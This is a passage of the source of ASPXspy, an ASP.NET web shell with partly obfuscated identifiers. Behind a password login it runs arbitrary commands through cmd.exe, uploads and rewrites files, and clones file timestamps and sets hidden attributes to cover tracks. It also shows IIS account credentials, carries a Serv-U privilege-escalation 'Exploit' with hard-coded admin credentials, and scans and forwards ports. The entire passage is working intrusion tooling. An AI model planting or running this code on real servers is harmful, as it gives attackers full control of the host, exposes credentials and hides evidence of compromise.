  1803. catch (Exception ex) { }
  1804. }
  1805. }
  1806. protected void vuou()
  1807. {
  1808. PortForward gYP=new PortForward();
  1809. gYP.lyTOK();
  1810. }
  1811. protected void ruQO()
  1812. {
  1813. PortForward gYP=new PortForward();
  1814. gYP.Start(llH.Value,int.Parse(ZHS.Value),eEpm.Value,int.Parse(iXdh.Value));
  1815. }
  1816. public string mRDl(string instr)
  1817. {
  1818. string tmp=null;
  1819. try
  1820. {
  1821. tmp=System.Net.Dns.Resolve(instr).AddressList[0].ToString();
  1822. }
  1823. catch(Exception e)
  1824. {
  1825. }
  1826. return tmp;
  1827. }
  1828. public void VikG()
  1829. {
  1830. string[] OTV=lOmX.Text.ToString().Split(',');
  1831. for(int i=0;i<OTV.Length;i++)
  1832. {
  1833. IVc.Add(new ScanPort(mRDl(MdR.Text.ToString()),Int32.Parse(OTV[i])));
  1834. }
  1835. try
  1836. {
  1837. Thread[] kbXY=new Thread[IVc.Count];
  1838. int sdO=0;
  1839. for(sdO=0;sdO<IVc.Count;sdO++)
  1840. {
  1841. kbXY[sdO]=new Thread(new ThreadStart(((ScanPort)IVc[sdO]).Scan));
  1842. kbXY[sdO].Start();
  1843. }
  1844. for(sdO=0;sdO<kbXY.Length;sdO++)
  1845. kbXY[sdO].Join();
  1846. }
  1847. catch
  1848. {
  1849. }
  1850. }
  1851. public class ScanPort
  1852. {
  1853. private string _ip="";
  1854. private int jTdO=0;
  1855. private TimeSpan _timeSpent;
  1856. private string QGcH="Not scanned";
  1857. public string ip
  1858. {
  1859. get { return _ip;}
  1860. }
  1861. public int port
  1862. {
  1863. get { return jTdO;}
  1864. }
  1865. public string status
  1866. {
  1867. get { return QGcH;}
  1868. }
  1869. public TimeSpan timeSpent
  1870. {
  1871. get { return _timeSpent;}
  1872. }
  1873. public ScanPort(string ip,int port)
  1874. {
  1875. _ip=ip;
  1876. jTdO=port;
  1877. }
  1878. public void Scan()
  1879. {
  1880. TcpClient iYap=new TcpClient();
  1881. DateTime qYZT=DateTime.Now;
  1882. try
  1883. {
  1884. iYap.Connect(_ip,jTdO);
  1885. iYap.Close();
  1886. QGcH="<font color=green><b>Open</b></font>";
  1887. }
  1888. catch
  1889. {
  1890. QGcH="<font color=red><b>Close</b></font>";
  1891. }
  1892. _timeSpent=DateTime.Now.Subtract(qYZT);
  1893. }
  1894. }
  1895. public static void YFcNP(System.Web.UI.Page page)
  1896. {
  1897. page.RegisterHiddenField("__EVENTTARGET","");
  1898. page.RegisterHiddenField("__FILE","");
  1899. string s=@"<script language=Javascript>";
  1900. s+=@"function Bin_PostBack(eventTarget,eventArgument)";
  1901. s+=@"{";
  1902. s+=@"var theform=document.forms[0];";
  1903. s+=@"theform.__EVENTTARGET.value=eventTarget;";
  1904. s+=@"theform.__FILE.value=eventArgument;";
  1905. s+=@"theform.submit();";
  1906. s+=@"} ";
  1907. s+=@"</scr"+"ipt>";
  1908. page.RegisterStartupScript("",s);
  1909. }
  1910. protected void PPtK(object sender,EventArgs e)
  1911. {
  1912. WICxe();
  1913. yhv.Visible=true;
  1914. Bin_H2_Title.InnerText="File Search >>";
  1915. NaLJ.Value=Request.PhysicalApplicationPath;
  1916. oJiym.Visible=false;
  1917. }
  1918. protected void NBy(object sender,EventArgs e)
  1919. {
  1920. DirectoryInfo GQMM=new DirectoryInfo(NaLJ.Value);
  1921. if(!GQMM.Exists)
  1922. {
  1923. xseuB("Path invalid ! ");
  1924. return;
  1925. }
  1926. oog(GQMM);
  1927. xseuB("Search completed ! ");
  1928. }
  1929. public void oog(DirectoryInfo dir)
  1930. {
  1931. try
  1932. {
  1933. oJiym.Visible=true;
  1934. foreach(FileInfo Bin_Files in dir.GetFiles())
  1935. {
  1936. try
  1937. {
  1938. if(Bin_Files.FullName==Request.PhysicalPath)
  1939. {
  1940. continue;
  1941. }
  1942. if(!Regex.IsMatch(Bin_Files.Extension.Replace(".",""),"^("+UDLvA.Value+")$",RegexOptions.IgnoreCase))
  1943. {
  1944. continue;
  1945. }
  1946. if(Ven.SelectedItem.Value=="name")
  1947. {
  1948. if(rAQ.Checked)
  1949. {
  1950. if(Regex.IsMatch(Bin_Files.Name,iaMKl.Value,RegexOptions.IgnoreCase))
  1951. {
  1952. FJvQ(Bin_Files);
  1953. }
  1954. }
  1955. else
  1956. {
  1957. if(Bin_Files.Name.ToLower().IndexOf(iaMKl.Value.ToLower())!=-1)
  1958. {
  1959. Response.Write(Bin_Files.FullName);
  1960. FJvQ(Bin_Files);
  1961. }
  1962. }
  1963. }
  1964. else
  1965. {
  1966. StreamReader sr=new StreamReader(Bin_Files.FullName,Encoding.Default);
  1967. string ava=sr.ReadToEnd();
  1968. sr.Close();
  1969. if(rAQ.Checked)
  1970. {
  1971. if(Regex.IsMatch(ava,iaMKl.Value,RegexOptions.IgnoreCase))
  1972. {
  1973. FJvQ(Bin_Files);
  1974. if(YZw.Checked)
  1975. {
  1976. ava=Regex.Replace(ava,iaMKl.Value,qPe.Value,RegexOptions.IgnoreCase);
  1977. StreamWriter sw=new StreamWriter(Bin_Files.FullName,false,Encoding.Default);
  1978. sw.Write(ava);
  1979. sw.Close();
  1980. }
  1981. }
  1982. }
  1983. else
  1984. {
  1985. if(ava.ToLower().IndexOf(iaMKl.Value.ToLower())!=-1)
  1986. {
  1987. FJvQ(Bin_Files);
  1988. if(YZw.Checked)
  1989. {
  1990. ava=Strings.Replace(ava,iaMKl.Value,qPe.Value,1,-1,CompareMethod.Text);
  1991. StreamWriter sw=new StreamWriter(Bin_Files.FullName,false,Encoding.Default);
  1992. sw.Write(ava);
  1993. sw.Close();
  1994. }
  1995. }
  1996. }
  1997. }
  1998. }
  1999. catch(Exception ex)
  2000. {
  2001. xseuB(ex.Message);
  2002. continue;
  2003. }
  2004. }
  2005. foreach(DirectoryInfo subdir in dir.GetDirectories())
  2006. {
  2007. oog(subdir);
  2008. }
  2009. }
  2010. catch(Exception ex)
  2011. {
  2012. xseuB(ex.Message);
  2013. }
  2014. }
  2015. public void FJvQ(FileInfo objfile)
  2016. {
  2017. TableRow tr=new TableRow();
  2018. TableCell tc=new TableCell();
  2019. string bg=OKM();
  2020. tr.Attributes["onmouseover"]="this.className='focus';";
  2021. tr.CssClass=bg;
  2022. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
  2023. tc.Text="<a href=\"javascript:Bin_PostBack('Bin_Listdir','"+MVVJ(objfile.DirectoryName)+"')\">"+objfile.FullName+"</a>";
  2024. tr.Cells.Add(tc);
  2025. tc=new TableCell();
  2026. tc.Text=objfile.LastWriteTime.ToString();
  2027. tr.Cells.Add(tc);
  2028. tc=new TableCell();
  2029. tc.Text=mTG(objfile.Length);
  2030. tr.Cells.Add(tc);
  2031. oJiym.Rows.Add(tr);
  2032. }
  2033. public void xseuB(string instr)
  2034. {
  2035. jDKt.Visible=true;
  2036. jDKt.InnerText=instr;
  2037. }
  2038. protected void xVm(object sender,EventArgs e)
  2039. {
  2040. string Jfm=FormsAuthentication.HashPasswordForStoringInConfigFile(HRJ.Text,"MD5").ToLower();
  2041. if(Jfm==Password)
  2042. {
  2043. Response.Cookies.Add(new HttpCookie(vbhLn,Password));
  2044. ljtzC.Visible=false;
  2045. PBZw();
  2046. }
  2047. else
  2048. {
  2049. tZSx();
  2050. }
  2051. }
  2052. protected void Ybg(object sender,EventArgs e)
  2053. {
  2054. krIR(Server.MapPath("."));
  2055. }
  2056. protected void KjPi(object sender,EventArgs e)
  2057. {
  2058. Bin_H2_Title.InnerText="IIS Spy >>";
  2059. WICxe();
  2060. VNR.Visible=true;
  2061. AdCx();
  2062. }
  2063. protected void DGCoW(object sender,EventArgs e)
  2064. {
  2065. try
  2066. {
  2067. StreamWriter sw;
  2068. if(NdCX.SelectedItem.Text=="UTF-8")
  2069. {
  2070. sw=new StreamWriter(Sqon.Value,false,Encoding.UTF8);
  2071. }
  2072. else
  2073. {
  2074. sw=new StreamWriter(Sqon.Value,false,Encoding.Default);
  2075. }
  2076. sw.Write(Xgvv.InnerText);
  2077. sw.Close();
  2078. xseuB("Save file success !");
  2079. }
  2080. catch(Exception error)
  2081. {
  2082. xseuB(error.Message);
  2083. }
  2084. krIR(AXSbb.Value);
  2085. }
  2086. protected void lbjLD(object sender,EventArgs e)
  2087. {
  2088. string FlwA=AXSbb.Value;
  2089. FlwA=OElM(FlwA);
  2090. try
  2091. {
  2092. Fhq.PostedFile.SaveAs(FlwA+Path.GetFileName(Fhq.Value));
  2093. xseuB("File upload success!");
  2094. }
  2095. catch(Exception error)
  2096. {
  2097. xseuB(error.Message);
  2098. }
  2099. krIR(AXSbb.Value);
  2100. }
  2101. protected void EXV(object sender,EventArgs e)
  2102. {
  2103. krIR(AXSbb.Value);
  2104. }
  2105. protected void mcCY(object sender,EventArgs e)
  2106. {
  2107. krIR(Server.MapPath("."));
  2108. }
  2109. protected void iVk(object sender,CommandEventArgs e)
  2110. {
  2111. krIR(e.CommandArgument.ToString());
  2112. }
  2113. protected void XXrLw(object sender,EventArgs e)
  2114. {
  2115. try
  2116. {
  2117. File.SetCreationTimeUtc(QiFB.Value,File.GetCreationTimeUtc(lICp.Value));
  2118. File.SetLastAccessTimeUtc(QiFB.Value,File.GetLastAccessTimeUtc(lICp.Value));
  2119. File.SetLastWriteTimeUtc(QiFB.Value,File.GetLastWriteTimeUtc(lICp.Value));
  2120. xseuB("File time clone success!");
  2121. }
  2122. catch(Exception error)
  2123. {
  2124. xseuB(error.Message);
  2125. }
  2126. krIR(AXSbb.Value);
  2127. }
  2128. protected void tIykC(object sender,EventArgs e)
  2129. {
  2130. string path=pWVL.Value;
  2131. try
  2132. {
  2133. File.SetAttributes(path,FileAttributes.Normal);
  2134. if(ZhWSK.Checked)
  2135. {
  2136. File.SetAttributes(path,FileAttributes.ReadOnly);
  2137. }
  2138. if(SsR.Checked)
  2139. {
  2140. File.SetAttributes(path,File.GetAttributes(path)| FileAttributes.System);
  2141. }
  2142. if(ccB.Checked)
  2143. {
  2144. File.SetAttributes(path,File.GetAttributes(path)| FileAttributes.Hidden);
  2145. }
  2146. if(fbyZ.Checked)
  2147. {
  2148. File.SetAttributes(path,File.GetAttributes(path)| FileAttributes.Archive);
  2149. }
  2150. File.SetCreationTimeUtc(path,Convert.ToDateTime(yUqx.Value));
  2151. File.SetLastAccessTimeUtc(path,Convert.ToDateTime(aLsn.Value));
  2152. File.SetLastWriteTimeUtc(path,Convert.ToDateTime(uYjw.Value));
  2153. xseuB("File attributes modify success!");
  2154. }
  2155. catch(Exception error)
  2156. {
  2157. xseuB(error.Message);
  2158. }
  2159. krIR(AXSbb.Value);
  2160. }
  2161. protected void VOxn(object sender,EventArgs e)
  2162. {
  2163. WICxe();
  2164. vIac.Visible=true;
  2165. Bin_H2_Title.InnerText="Execute Command >>";
  2166. }
  2167. protected void FbhN(object sender,EventArgs e)
  2168. {
  2169. try
  2170. {
  2171. Process ahAE=new Process();
  2172. ahAE.StartInfo.FileName=kusi.Value;
  2173. ahAE.StartInfo.Arguments=bkcm.Value;
  2174. ahAE.StartInfo.UseShellExecute=false;
  2175. ahAE.StartInfo.RedirectStandardInput=true;
  2176. ahAE.StartInfo.RedirectStandardOutput=true;
  2177. ahAE.StartInfo.RedirectStandardError=true;
  2178. ahAE.Start();
  2179. string Uoc=ahAE.StandardOutput.ReadToEnd();
  2180. Uoc=Uoc.Replace("<","&lt;");
  2181. Uoc=Uoc.Replace(">","&gt;");
  2182. Uoc=Uoc.Replace("\r\n","<br>");
  2183. tnQRF.Visible=true;
  2184. tnQRF.InnerHtml="<hr width=\"100%\" noshade/><pre>"+Uoc+"</pre>";
  2185. }
  2186. catch(Exception error)
  2187. {
  2188. xseuB(error.Message);
  2189. }
  2190. }
  2191. protected void RAFL(object sender,EventArgs e)
  2192. {
  2193. if(qPdI.Text.Length>0)
  2194. {
  2195. tpRQ(qPdI.Text);
  2196. }
  2197. else
  2198. {
  2199. lFAvw();
  2200. }
  2201. }
  2202. protected void Grxk(object sender,EventArgs e)
  2203. {
  2204. YUw();
  2205. }
  2206. protected void ilC(object sender,EventArgs e)
  2207. {
  2208. tZRH();
  2209. }
  2210. protected void HtB(object sender,EventArgs e)
  2211. {
  2212. pDVM();
  2213. }
  2214. protected void Olm(object sender,EventArgs e)
  2215. {
  2216. iLVUT();
  2217. }
  2218. protected void jXhS(object sender,EventArgs e)
  2219. {
  2220. ADCpk();
  2221. }
  2222. protected void lRfRj(object sender,EventArgs e)
  2223. {
  2224. lDODR();
  2225. }
  2226. protected void xSy(object sender,EventArgs e)
  2227. {
  2228. xFhz();
  2229. }
  2230. protected void dMx(object sender,EventArgs e)
  2231. {
  2232. rAhe();
  2233. }
  2234. protected void zOVO(object sender,EventArgs e)
  2235. {
  2236. if(((DropDownList)sender).ID.ToString()=="WYmo")
  2237. {
  2238. dQIIF.Visible=false;
  2239. MasR.Text=WYmo.SelectedItem.Value.ToString();
  2240. }
  2241. if(((DropDownList)sender).ID.ToString()=="Pvf")
  2242. {
  2243. xTZY();
  2244. }
  2245. if(((DropDownList)sender).ID.ToString()=="FGEy")
  2246. {
  2247. jHIy.InnerText=FGEy.SelectedItem.Value.ToString();
  2248. }
  2249. if(((DropDownList)sender).ID.ToString()=="NdCX")
  2250. {
  2251. gLKc(Sqon.Value);
  2252. }
  2253. }
  2254. protected void IkkO(object sender,EventArgs e)
  2255. {
  2256. krIR(AXSbb.Value);
  2257. }
  2258. protected void BGY(object sender,EventArgs e)
  2259. {
  2260. vCf();
  2261. }
  2262. protected void cptS(object sender,EventArgs e)
  2263. {
  2264. vNCHZ();
  2265. }
  2266. protected void fDO(object sender,EventArgs e)
  2267. {
  2268. MHLv();
  2269. }
  2270. protected void vJNsE(object sender,EventArgs e)
  2271. {
  2272. vuou();
  2273. xseuB("Clear All Thread ......");
  2274. }
  2275. protected void wDZ(object sender,EventArgs e)
  2276. {
  2277. if(iXdh.Value=="" || eEpm.Value.Length<7 || ZHS.Value=="")return;
  2278. ruQO();
  2279. xseuB("All Thread Start ......");
  2280. }
  2281. protected void tYoZ(object sender,EventArgs e)
  2282. {
  2283. }
  2284. protected void ELkQ(object sender,EventArgs e)
  2285. {
  2286. VikG();
  2287. GBYT.Visible=true;
  2288. string res=string.Empty;
  2289. foreach(ScanPort th in IVc)
  2290. {
  2291. res+=th.ip+" : "+th.port+" ................................. "+th.status+"<br>";
  2292. }
  2293. GBYT.InnerHtml=res;
  2294. }
  2295. protected void ORUgV(object sender,EventArgs e)
  2296. {
  2297. dwgT();
  2298. }
  2299. public void WICxe()
  2300. {
  2301. DCbS.Visible=false;
  2302. CzfO.Visible=false;
  2303. APl.Visible=false;
  2304. vIac.Visible=false;
  2305. kkHN.Visible=false;
  2306. YwLB.Visible=false;
  2307. iDgmL.Visible=false;
  2308. hOWTm.Visible=false;
  2309. vrFA.Visible=false;
  2310. yhv.Visible=false;
  2311. }
  2312. </script>
  2313. <html xmlns="http://www.w3.org/1999/xhtml" >
  2314. <head id="Head1" runat="server">
  2315. <meta http-equiv="Content-Type" content="text/html;charset=utf-8"/>
  2316. <title>ASPXspy</title>
  2317. <style type="text/css">
  2318. .Bin_Style_Login{font:11px Verdana;BACKGROUND: #FFFFFF;border: 1px solid #666666;}
  2319. body,td{font: 12px Arial,Tahoma;line-height: 16px;}
  2320. .input{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:16px;}
  2321. .list{font:12px Arial,Tahoma;height:23px;}
  2322. .area{font:12px 'Courier New',Monospace;background:#fff;border: 1px solid #666;padding:2px;}
  2323. .bt {border-color:#b0b0b0;background:#3d3d3d;color:#ffffff;font:12px Arial,Tahoma;height:22px;}
  2324. a {color: #00f;text-decoration:underline;}
  2325. a:hover{color: #f00;text-decoration:none;}
  2326. .alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ededed;padding:5px 10px 5px 5px;}
  2327. .alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#fafafa;padding:5px 10px 5px 5px;}
  2328. .focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 10px 5px 5px;}
  2329. .head td{border-top:1px solid #ddd;border-bottom:1px solid #ccc;background:#e8e8e8;padding:5px 10px 5px 5px;font-weight:bold;}
  2330. .head td span{font-weight:normal;}
  2331. form{margin:0;padding:0;}
  2332. h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}
  2333. ul.info li{margin:0;color:#444;line-height:24px;height:24px;}
  2334. u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
  2335. .u1{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
  2336. .u2{text-decoration: none;color:#777;float:left;display:block;width:350px;margin-right:10px;}
  2337. </style>
  2338. <script type="text/javascript">
  2339. function CheckAll(form){
  2340. for(var i=0;i<form.elements.length;i++){
  2341. var e=form.elements[i];
  2342. if(e.name!='chkall')
  2343. e.checked=form.chkall.checked;
  2344. }
  2345. }
  2346. </script>
  2347. </head>
  2348. <body style="margin:0;table-layout:fixed;">
  2349. <form id="ASPXSpy" runat="server">
  2350. <div id="ljtzC" runat="server" style=" margin:15px" enableviewstate="false" visible="false" >
  2351. <span style="font:11px Verdana;">Password:</span>
  2352. <asp:TextBox ID="HRJ" runat="server" Columns="20" CssClass="Bin_Style_Login" ></asp:TextBox>
  2353. <asp:Button ID="ZSnXu" runat="server" Text="Login" CssClass="Bin_Style_Login" OnClick="xVm"/><p/>
  2354. Copyright &copy; 2009 Bin -- <a href="http://www.rootkit.net.cn" target="_blank">www.rootkit.net.cn</a>
  2355. </div>
  2356. <div id="ZVS" runat="server">
  2357. <div id="Zzj" runat="server">
  2358. <table width="100%" border="0" cellpadding="0" cellspacing="0">
  2359. <tr class="head">
  2360. <td ><span style="float:right;"><a href="http://www.rootkit.net.cn" target="_blank">ASPXSpy Ver: 2009</a></span><span id="Bin_Span_Sname" runat="server" enableviewstate="true"></span></td>
  2361. </tr>
  2362. <tr class="alt1">
  2363. <td><span style="float:right;" id="Bin_Span_FrameVersion" runat="server"></span>
  2364. <asp:LinkButton ID="UtkN" runat="server" OnClick="YKpI" Text="Logout" ></asp:LinkButton> | <asp:LinkButton ID="RsqhW" runat="server" Text="File Manager" OnClick="Ybg"></asp:LinkButton> | <asp:LinkButton ID="xxzE" runat="server" Text="CmdShell" OnClick="VOxn"></asp:LinkButton> | <asp:LinkButton ID="nuc" runat="server" Text="IIS Spy" OnClick="KjPi"></asp:LinkButton> | <asp:LinkButton ID="OREpx" runat="server" Text="Process" OnClick="Grxk"></asp:LinkButton> | <asp:LinkButton ID="jHN" runat="server" Text="Services" OnClick="ilC"></asp:LinkButton> | <asp:LinkButton ID="PHq" runat="server" Text="UserInfo" OnClick="Olm"></asp:LinkButton> | <asp:LinkButton ID="wmgnK" runat="server" Text="SysInfo" OnClick="HtB"></asp:LinkButton> | <asp:LinkButton ID="FeV" runat="server" Text="FileSearch" OnClick="PPtK"></asp:LinkButton> | <asp:LinkButton ID="PVQ" runat="server" Text="SU Exp" OnClick="jXhS"></asp:LinkButton> | <asp:LinkButton ID="jNDb" runat="server" Text="RegShell" OnClick="xSy"></asp:LinkButton> | <asp:LinkButton ID="HDQ" runat="server" Text="PortScan" OnClick="cptS" ></asp:LinkButton> | <asp:LinkButton ID="AoI" runat="server" Text="DataBase" OnClick="dMx"></asp:LinkButton> | <asp:LinkButton ID="KHbEd" runat="server" Text="PortMap" OnClick="fDO"></asp:LinkButton>
  2365. </td>
  2366. </tr>
  2367. </table>
  2368. </div>
  2369. <table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>
  2370. <div id="jDKt" style="background:#f1f1f1;border:1px solid #ddd;padding:15px;font:14px;text-align:center;font-weight:bold;" runat="server" visible="false" enableviewstate="false"></div>
  2371. <h2 id="Bin_H2_Title" runat="server"></h2>
  2372. <%--FileList--%>
  2373. <div id="CzfO" runat="server">
  2374. <table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
  2375.  <tr>
  2376. <td style=" white-space:nowrap">Current Directory : </td>
  2377. <td style=" width:100%"><input class="input" id="AXSbb" type="text" style="width:97%;margin:0 8px;" runat="server"/>
  2378. </td>
  2379. <td style="white-space:nowrap" ><asp:Button ID="xaGwl" runat="server" Text="Go" CssClass="bt" OnClick="EXV"/></td>
  2380.  </tr>
  2381. </table>
  2382. <table width="100%" border="0" cellpadding="4" cellspacing="0">
  2383. <tr class="alt1"><td colspan="7" style="padding:5px;">
  2384. <div style="float:right;"><input id="Fhq" class="input" runat="server" type="file" style=" height:22px"/>
  2385. <asp:Button ID="RvPp" CssClass="bt" runat="server" Text="Upload" OnClick="lbjLD"/></div><asp:LinkButton ID="OLJFp" runat="server" Text="WebRoot" OnClick="mcCY"></asp:LinkButton> | <a href="#" id="Bin_Button_CreateDir" runat="server">Create Directory</a> | <a href="#" id="Bin_Button_CreateFile" runat="server">Create File</a>
  2386.  | <span id="Bin_Span_Drv" runat="server"></span><a href="#" id="Bin_Button_KillMe" runat="server" style="color:Red">Kill Me</a>
  2387. </td></tr>
  2388. <asp:Table ID="UGzP" runat="server" Width="100%" CellSpacing="0" >
  2389. <asp:TableRow CssClass="head"><asp:TableCell>&nbsp;</asp:TableCell><asp:TableCell>Filename</asp:TableCell><asp:TableCell Width="25%">Last modified</asp:TableCell><asp:TableCell Width="15%">Size</asp:TableCell><asp:TableCell Width="25%">Action</asp:TableCell></asp:TableRow>
  2390. </asp:Table>
  2391. </table>
  2392. </div>
  2393. <%--FileEdit--%>
  2394. <div id="vrFA" runat="server">
  2395. <p>Current File(import new file name and new file)<br/>
  2396. <input class="input" id="Sqon" type="text" size="100" runat="server"/> <asp:DropDownList ID="NdCX" runat="server" CssClass="list" AutoPostBack="true" OnSelectedIndexChanged="zOVO"><asp:ListItem>Default</asp:ListItem><asp:ListItem>UTF-8</asp:ListItem></asp:DropDownList>
  2397. </p>
  2398. <p>File Content<br/>
  2399. <textarea id="Xgvv" runat="server" class="area" cols="100" rows="25" enableviewstate="true" ></textarea>
  2400. </p>
  2401. <p><asp:Button ID="JJjbW" runat="server" Text="Submit" CssClass="bt" OnClick="DGCoW"/> <asp:Button ID="iCNu" runat="server" Text="Back" CssClass="bt" OnClick="IkkO"/></p>
  2402. </div>
  2403. <%--CloneTime--%>
  2404. <div id="zRyG" runat="server" enableviewstate="false" visible="false">
  2405. <p>Alter file<br/><input class="input" id="QiFB" type="text" size="120" runat="server"/></p>
  2406. <p>Reference file(fullpath)<br/><input class="input" id="lICp" type="text" size="120" runat="server"/></p>
  2407. <p><asp:Button ID="JEaxV" runat="server" Text="Submit" CssClass="bt" OnClick="XXrLw"/></p>
  2408. <h2>Set last modified &raquo;</h2>
  2409. <p>Current file(fullpath)<br/><input class="input" id="pWVL" type="text" size="120" runat="server"/></p>
  2410. <p>
  2411. <asp:CheckBox ID="ZhWSK" runat="server" Text="ReadOnly" EnableViewState="False"/>
  2412. &nbsp;
  2413. <asp:CheckBox ID="SsR" runat="server" Text="System" EnableViewState="False"/>
  2414. &nbsp;
  2415. <asp:CheckBox ID="ccB" runat="server" Text="Hidden" EnableViewState="False"/>
  2416. &nbsp;
  2417. <asp:CheckBox ID="fbyZ" runat="server" Text="Archive" EnableViewState="False"/>
  2418. </p>
  2419. <p>
  2420. CreationTime :
  2421. <input class="input" id="yUqx" type="text" runat="server"/>
  2422. LastWriteTime :
  2423. <input class="input" id="uYjw" type="text" runat="server"/>
  2424. LastAccessTime :
  2425. <input class="input" id="aLsn" type="text" runat="server"/>
  2426. </p>
  2427. <p>
  2428. <asp:Button ID="kOG" CssClass="bt" runat="server" Text="Submit" OnClick="tIykC"/>
  2429. </p>
  2430. </div>
  2431. <%--IISSpy--%>
  2432. <div runat="server" id="VNR" visible="false" enableviewstate="false">
  2433. <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
  2434. <asp:Table ID="GlI" runat="server" Width="100%" CellSpacing="0">
  2435. <asp:TableRow CssClass="head"><asp:TableCell>ID</asp:TableCell><asp:TableCell>IIS_USER</asp:TableCell><asp:TableCell>IIS_PASS</asp:TableCell><asp:TableCell>Domain</asp:TableCell><asp:TableCell>Path</asp:TableCell></asp:TableRow>
  2436. </asp:Table>
  2437. </table>
  2438. </div>
  2439. <%--Process--%>
  2440. <div runat="server" id="DCbS" visible="false" enableviewstate="false">
  2441. <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
  2442. <asp:Table ID="IjsL" runat="server" Width="100%" CellSpacing="0" >
  2443. <asp:TableRow CssClass="head"><asp:TableCell></asp:TableCell><asp:TableCell>ID</asp:TableCell><asp:TableCell>Process</asp:TableCell><asp:TableCell>ThreadCount</asp:TableCell><asp:TableCell>Priority</asp:TableCell><asp:TableCell>Action</asp:TableCell></asp:TableRow>
  2444. </asp:Table>
  2445. </table>
  2446. </div>
  2447. <%--CmdShell--%>
  2448. <div runat="server" id="vIac">
  2449.  <p>CmdPath:<br/>
  2450.  <input class="input" runat="server" id="kusi" type="text" size="100" value="c:\windows\system32\cmd.exe"/>
  2451.  </p>
  2452.  Argument:<br/>
  2453.  <input class="input" runat="server" id="bkcm" value="/c Set" type="text" size="100"/> <asp:Button ID="YrqL" CssClass="bt" runat="server" Text="Submit" OnClick="FbhN"/>
  2454.  <div id="tnQRF" runat="server" visible="false" enableviewstate="false">
  2455.  </div>
  2456. </div>
  2457. <%--Services--%>
  2458. <div runat="server" id="iQxm" visible ="false" enableviewstate="false">
  2459. <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
  2460. <asp:Table ID="vHCs" runat="server" Width="100%" CellSpacing="0" >
  2461. <asp:TableRow CssClass="head"><asp:TableCell></asp:TableCell><asp:TableCell>ID</asp:TableCell><asp:TableCell>Name</asp:TableCell><asp:TableCell>Path</asp:TableCell><asp:TableCell>State</asp:TableCell><asp:TableCell>StartMode</asp:TableCell></asp:TableRow>
  2462. </asp:Table>
  2463. </table>
  2464. </div>
  2465. <%--Sysinfo--%>
  2466. <div runat="server" id="ghaB" visible="false" enableviewstate="false">
  2467. <hr style=" border: 1px solid #ddd;height:0px;"/>
  2468. <ul class="info" id="Bin_Ul_Sys" runat="server"></ul>
  2469. <h2 id="Bin_H2_Mac" runat="server"></h2>
  2470. <hr style=" border: 1px solid #ddd;height:0px;"/>
  2471. <ul class="info" id ="Bin_Ul_NetConfig" runat="server"></ul>
  2472. <h2 id="Bin_H2_Driver" runat="server"></h2>
  2473. <hr style=" border: 1px solid #ddd;height:0px;"/>
  2474. <ul class="info" id ="Bin_Ul_Driver" runat="server"></ul>
  2475. </div>
  2476. <%--UserInfo--%>
  2477. <div runat="server" id="xWVQ" visible="false" enableviewstate="false">
  2478. <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
  2479. <asp:Table ID="VPa" runat="server" Width="100%" CellSpacing="0" >
  2480. </asp:Table>
  2481. </table>
  2482. </div>
  2483. <%--SuExp--%>
  2484.  <div runat="server" id="APl">
  2485. <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
  2486.  <tr align="center">
  2487.  <td style="width:10%"></td>
  2488.  <td style="width:20%" align="left">UserName : <input class="input" runat="server" id="dNohJ" type="text" size="20" value="localadministrator"/></td>
  2489.  <td style="width:20%" align="left">PassWord : <input class="input" runat="server" id="NMd" type="text" size="20" value="#l@$ak#.lk;0@P"/></td>
  2490.  <td style="width:20%" align="left">Port : <input class="input" runat="server" id="HlQl" type="text" size="20" value="43958"/></td>
  2491.  <td style="width:10%"></td>
  2492.  </tr>
  2493.  <tr >
  2494.  <td style="width:10%"></td>
  2495.  <td colspan="5">CmdShell&nbsp;&nbsp;:&nbsp;<input class="input" runat="server" id="mHbjB" type="text" size="100" value="cmd.exe /c net user"/> <asp:Button ID="SPhc" CssClass="bt" runat="server" Text="Exploit" OnClick="lRfRj"/></td>
  2496.  </tr>
  2497. </table>
  2498. <div id="UHlA" visible="false" enableviewstate="false" runat="server">
  2499. <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
  2500. <tr align="center">
  2501. <td style="width:30%"></td>
  2502. <td align="left" style="width:40%"><pre id="Bin_Td_Res" runat="server"></pre></td>
  2503. <td style="width:30%"></td>
  2504. </tr>
  2505. </table>
  2506. </div>
  2507. </div>
  2508. <%--Reg--%>
  2509. <div id="kkHN" runat="server">
  2510. <p>Registry Path : <asp:TextBox id="qPdI" style="width:85%;margin:0 8px;" CssClass="input" runat="server"/><asp:Button ID="MoNA" runat="server" Text="Go" CssClass="bt" onclick="RAFL"/></p>
  2511. <table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
  2512. <asp:Table ID="pLWD" runat="server" Width="100%" CellSpacing="0" >
  2513. <asp:TableRow CssClass="alt1"><asp:TableCell ColumnSpan="2" id="vyX"></asp:TableCell></asp:TableRow>
  2514. <asp:TableRow CssClass="head"><asp:TableCell Width="40%">Key</asp:TableCell><asp:TableCell Width="60%">Value</asp:TableCell></asp:TableRow>
  2515. </asp:Table>
  2516. </table>
  2517. </div>
  2518. <%--PortScan--%>
  2519. <div id="YwLB" runat="server">
  2520. <p>
  2521. IP : <asp:TextBox id="MdR" style="width:10%;margin:0 8px;" CssClass="input" runat="server" Text="127.0.0.1"/> Port : <asp:TextBox id="lOmX" style="width:40%;margin:0 8px;" CssClass="input" runat="server" Text="21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500"/> <asp:Button ID="CmUCh" runat="server" Text="Scan" CssClass="bt" OnClick="ELkQ"/>
  2522. </p>
  2523. <div id="GBYT" runat="server" visible="false" enableviewstate="false"></div>
  2524. </div>
